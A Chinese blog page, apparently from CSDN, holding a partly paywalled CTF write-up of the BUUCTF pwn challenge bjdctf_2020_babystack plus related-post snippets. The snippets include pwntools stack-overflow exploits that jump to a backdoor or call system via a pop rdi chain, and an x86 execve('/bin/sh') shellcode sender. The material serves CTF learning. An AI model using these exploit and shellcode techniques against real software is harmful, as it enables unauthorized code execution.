buuctf-bjdctf_2020_babystack(pwn)

最新推荐文章于 2025-09-24 18:13:16 发布
原创 最新推荐文章于 2025-09-24 18:13:16 发布 · 944 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全

bjdctf_2020_babystack题解

第一步:nc连接观察是否可以直接传入命令

不能直接运行,那么就得进一步分析了

第二步:查看文件的位数与信息

可以看到是64位的文件,并且开了nx保护

第三步:放到ida中反汇编查看函数的后门与如何构造溢出

可以看到主函数中有一个read函数可以造成溢出,传入了buf参数,看后面的注释应该是要偏移10位,那么我们就知道要偏移多少位了,下面要观察后门

通过分析这些函数,可以发现有一个backdoor这个函数,点进去观察一下

最低0.47元/天 解锁文章
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 1112
[buuctf]bjdctf_2020_babystack
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 430
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
bjdctf_2020_babystack
最新发布
2301_80245691的博客
09-24 136
摘要:本文分析了64位程序bjdctf_2020_babystack的漏洞利用过程。程序使用scanf读取输入长度但未检查边界,导致栈溢出。通过IDA发现存在backdoor函数,构造payload(24字节填充+backdoor地址)实现溢出攻击。调试时发现需要输入IP才能继续执行,最终利用脚本成功获取flag。漏洞成因在于未验证输入长度的危险函数组合使用。
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 450
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 432
BUUCTF 做题练习
bjdctf_2020_babystackBUUCTF
qq_41696518的博客
08-26 1118
bjdctf_2020_babystack
【CTF】BUUCTF-bjdctf_2020_babystack1
weixin_53394081的博客
03-06 664
PWN
[BUUCTF]PWN18——bjdctf_2020_babystack
mcmuyanga的博客
09-02 4396
[BUUCTF]PWN18——bjdctf_2020_babystack 附件 步骤: 例行检查,64位,开启了nx保护 试运行一下程序 大概了解程序的执行过程后用64位ida打开,shift+f12先查看一下程序里的字符串 看到/bin/sh双击跟进,ctrl+x找到了后门函数,shell_addr=0x4006e6 根据试运行的回显,找到了输入点 一个简单的小程序,buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出 EXP from pwn import* r=re
BUUCTF(pwn)bjdctf_2020_babystack
半岛铁盒的博客
03-29 502
from pwn import * p = remote("node3.buuoj.cn",27955) sys = 0x04006E6 p.sendlineafter("[+]Please input the length of your name:\n",'200') payload = 'a' * (0x10 + 0x8) + p64(sys) p.sendlineafter("[+]What's u name?\n",payload) p.interactive() 有疑问的欢迎留言∑ ...
BUUCTF bjdctf_2020_babystack
小白垃圾笔记2
04-30 496
有的,所以我们的利用思路就是将返回地址先覆盖为pop rdi;ret 的地址,将参数(/bin/sh)传入rdi。然后再将system的地址填充进去,这样pop rdi;执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用,并且存在/bin/sh。去找有没有pop rdi ret。小白做题笔记而已,不建议阅读。64为程序用rdi传参。read函数存在栈溢出。
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 390
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1628
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
BUUCTF|PWN-bjdctf_2020_babystack2-WP
l2645470582_的博客
11-09 511
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,我们看到关键字符串"/bin/sh" 然后我们找到后门函数的地址:backdoor_addr = 0x0400726 3.我们看看main函数里面的内容 我们看到第一个nbytes是有符号数,第二个nbytes就变成了无符号数 我们判断这是一个整数溢出 所以 -1 = 4294967295 4.EXP #encoding = utf-8 fr...
BUUCTF--pwnbjdctf_2020_babystack1
2401_88083440的博客
03-16 300
总结一下思路:首先buf的起始地址距离rbp距离为 0x10 ,我们需要再将 rbp 覆盖掉才能到“返回函数”,然后再将返回函数覆盖成我们的“后门函数”。这里的0x10 其实包含两部分,12是buf本身输入,4是对齐填充(学了计组也懂一点点了嘿)得到一些最基本的信息,比如64位,小端序,只开了NX保护。发现buf的读入可以被nbytes影响,可以进行栈溢出。首先将下载的文件拖入Ubuntu中,check一下。再进入ida64中查看。同时还找到了后门函数。
BUUCTF-bjdctf_2020_babystack2-WP
Rt1Text的博客
10-18 281
只有NX保护。
BUUCTFbjdctf_2020_babystack Write Up
古月浪子的博客
08-02 807
继续刷buuoj中… 看到上新题了,是当时比赛的时候做过的一道题,顺手打掉 程序只开了NX保护,读入字符数可控,直接ret2text解决 遇到的小问题是,本地环境打0x4006E6打不通,换成了0x4006EA,后来测试远程环境2个都可以,有点迷 =_= from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_lev
BUUCTF-others_shellcode
03-26
### BUUCTF Others Shellcode 题目解题思路 BUUCTF中的`Others_Shellcode`是一道典型的PWN类题目,主要考察选手对于Shellcode编写以及Linux环境下的漏洞利用能力。以下是关于该题目的核心解题思路: #### 一、题目背景与目标 此题目提供了一个可执行程序文件,其功能是读取用户输入并尝试运行特定指令。然而,由于存在某些安全机制未启用(如NX位关闭),攻击者可以注入自定义的Shellcode来实现任意命令执行。 通过分析可知,目标是要构造一段能够绕过现有防护措施的有效载荷(shellcode),最终达到获取flag的目的[^1]。 #### 二、具体技术细节解析 1. **逆向工程** 使用工具如Ghidra或者Radare2对给定二进制文件进行静态反汇编分析,确认入口点函数逻辑及其调用链路情况;同时也要注意查看是否有其他隐藏的功能模块被触发的可能性。 2. **确定ROP Gadget** 如果发现保护机制开启了部分控制流完整性验证,则可能需要用到Return-Oriented Programming (ROP) 技巧构建新的执行流程路径。这一步骤涉及查找合适的gadgets组合形成所需的系统调用序列。 3. **编写Shellcode** 基于上述准备好的信息,按照实际需求定制化设计payload内容。考虑到不同架构下寄存器分配规则差异等因素,在撰写过程中需格外小心处理字节顺序等问题以免引起错误行为发生。 4. **测试与调试** 利用QEMU模拟真实机器环境下多次试验调整直至成功完成挑战为止。期间还可以借助strace跟踪进程活动状况以便更好地理解整个交互过程的工作原理。 ```python from pwn import * context.arch = 'i386' shellcode = asm(''' xor eax, eax # 清零EAX 寄存器 push eax # 将 NULL 推入堆栈作为字符串终止符 # 此处创建 "/bin/sh\x00" 的一部分 push 0x68732f6e # hs/n push 0x69622f2f # ib// mov ebx, esp # EBX -> 参数1: 文件名指针 ("//bin/sh") cdq # EDX <- EAX 扩展成双字长形式 (清零EDX) # DX 是第二个参数,这里不需要设置任何东西 mov ecx, edx # ECX <- 第三个参数也是NULL mov al, 0xb # AL 设置为syscall编号 execve() int 0x80 # 发起中断请求操作系统服务 ''') p = process('./vuln') p.sendline(shellcode) log.success(f'Shellcode Sent! Waiting for shell...') p.interactive() ``` 以上脚本展示了如何生成适用于Intel x86体系结构的一个简单execve("/bin/sh", ...) 调用样例,并发送至服务器端等待响应。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值